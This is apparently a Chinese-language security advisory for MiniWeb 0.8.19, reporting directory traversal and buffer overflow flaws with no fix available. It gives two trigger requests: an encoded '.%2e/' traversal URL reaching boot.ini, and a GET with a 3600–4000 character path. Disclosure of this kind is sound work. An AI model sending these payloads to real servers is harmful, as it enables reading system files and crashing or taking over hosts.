MiniWeb是一款WEB服务程序。
MiniWeb不正确处理用户提交的输入,远程攻击者可以利用漏洞进行目录遍历和缓冲区溢出攻击。
如提交如下请求可导致触发漏洞:
http://www.example.com/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/boot.ini
GET /AAAA...[3600 - 4000]...AAAA/ HTTP/1.0
Stanley Huang MiniWeb 0.8.19
目前没有解决方案提供:
<a href=http://sourceforge.net/projects/miniweb target=_blank>http://sourceforge.net/projects/miniweb</a>
暂无评论